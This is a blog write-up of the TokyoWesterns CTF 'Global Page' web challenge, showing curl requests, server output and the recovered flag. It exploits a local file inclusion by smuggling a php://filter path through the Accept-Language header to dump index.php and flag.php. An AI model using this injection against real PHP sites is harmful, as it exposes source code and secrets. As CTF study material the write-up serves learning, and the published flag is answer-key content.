Global Page
Problem
This problem is not available now.
[09/03 01:14 +00:00] fixed.
Welcome to TokyoWesterns' CTF!
Flag
shpik@shpik:/ctf/MMA/web/gap$ curl http://globalpage.chal.ctf.westerns.tokyo/?page=tokyo
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
direction: rtl;
}
</style>
</head>
<body>
<br />
<b>Notice</b>: Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br />
<p>
<br />
<b>Warning</b>: include(tokyo/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
<br />
<b>Warning</b>: include(): Failed opening 'tokyo/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
</p>
</body>
</html>
HTTP_ACCEPT_LANGUAGE is file name.
and page is directory.
So i expect include $page.'/'.'HEADER HTTP_ACCEPT_LANGUAGE's value'
shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=index"
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
direction: rtl;
}
</style>
</head>
<body>
<p>
PD9waHAKaWYgKCFkZWZpbmVkKCdJTkNMVURFRF9JTkRFWCcpKSB7CmRlZmluZSgnSU5DTFVERURfSU5ERVgnLCB0cnVlKTsKaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAxKTsKaW5jbHVkZSAiZmxhZy5waHAiOwo/Pgo8IWRvY3R5cGUgaHRtbD4KPGh0bWw+CjxoZWFkPgo8bWV0YSBjaGFyc2V0PXV0Zi04Pgo8dGl0bGU+R2xvYmFsIFBhZ2U8L3RpdGxlPgo8c3R5bGU+Ci5ydGwgewogIGRpcmVjdGlvbjogcnRsOwp9Cjwvc3R5bGU+CjwvaGVhZD4KCjxib2R5Pgo8P3BocAokZGlyID0gIiI7CmlmKGlzc2V0KCRfR0VUWydwYWdlJ10pKSB7CgkkZGlyID0gc3RyX3JlcGxhY2UoWycuJywgJy8nXSwgJycsICRfR0VUWydwYWdlJ10pOwp9CgppZihlbXB0eSgkZGlyKSkgewo/Pgo8dWw+Cgk8bGk+PGEgaHJlZj0iLz9wYWdlPXRva3lvIj5Ub2t5bzwvYT48L2xpPgoJPGxpPjxkZWw+V2VzdGVybnM8L2RlbD48L2xpPgoJPGxpPjxhIGhyZWY9Ii8/cGFnZT1jdGYiPkNURjwvYT48L2xpPgo8L3VsPgo8P3BocAp9CmVsc2UgewoJZm9yZWFjaChleHBsb2RlKCIsIiwgJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIGFzICRsYW5nKSB7CgkJJGwgPSB0cmltKGV4cGxvZGUoIjsiLCAkbGFuZylbMF0pOwo/Pgo8cDw/PSgkbD09PSdoZScpPyIgY2xhc3M9cnRsIjoiIj8+Pgo8P3BocAoJCWluY2x1ZGUgIiRkaXIvJGwucGhwIjsKPz4KPC9wPgo8P3BocAoJfQp9Cj8+CjwvYm9keT4KPC9odG1sPgo8P3BocAp9Cj8+Cg==</p>
</body>
</html>
okey i get index.php with php://filter !
<!-- index.php --> <?php if (!defined('INCLUDED_INDEX')) { define('INCLUDED_INDEX', true); ini_set('display_errors', 1); include "flag.php"; ?> <!doctype html> <html> <head> <meta charset=utf-8> <title>Global Page</title> <style> .rtl { direction: rtl; } </style> </head> <body> <?php $dir = ""; if(isset($_GET['page'])) { $dir = str_replace(['.', '/'], '', $_GET['page']); } if(empty($dir)) { ?> <ul> <li><a href="/?page=tokyo">Tokyo</a></li> <li><del>Westerns</del></li> <li><a href="/?page=ctf">CTF</a></li> </ul> <?php } else { foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) { $l = trim(explode(";", $lang)[0]); ?> <p<?=($l==='he')?" class=rtl":""?>> <?php include "$dir/$l.php"; ?> </p> <?php } } ?> </body> </html> <?php } ?>
maybe i get flag.php's source for getting flag.
shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=flag"
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
direction: rtl;
}
</style>
</head>
<body>
<p>
PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==</p>
</body>
</html>
Flag is
[ TWCTF{I_found_simple_LFI} ]
'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글
[Crypto] Twin Prime - 50pts (0) | 2016.09.05 |
---|---|
[Web] Get the admin password! - 100pts (0) | 2016.09.05 |
[Web] Mortal Magi Agents - 300pts (0) | 2015.09.09 |
[Web] Login as admin! - 30pts (0) | 2015.09.08 |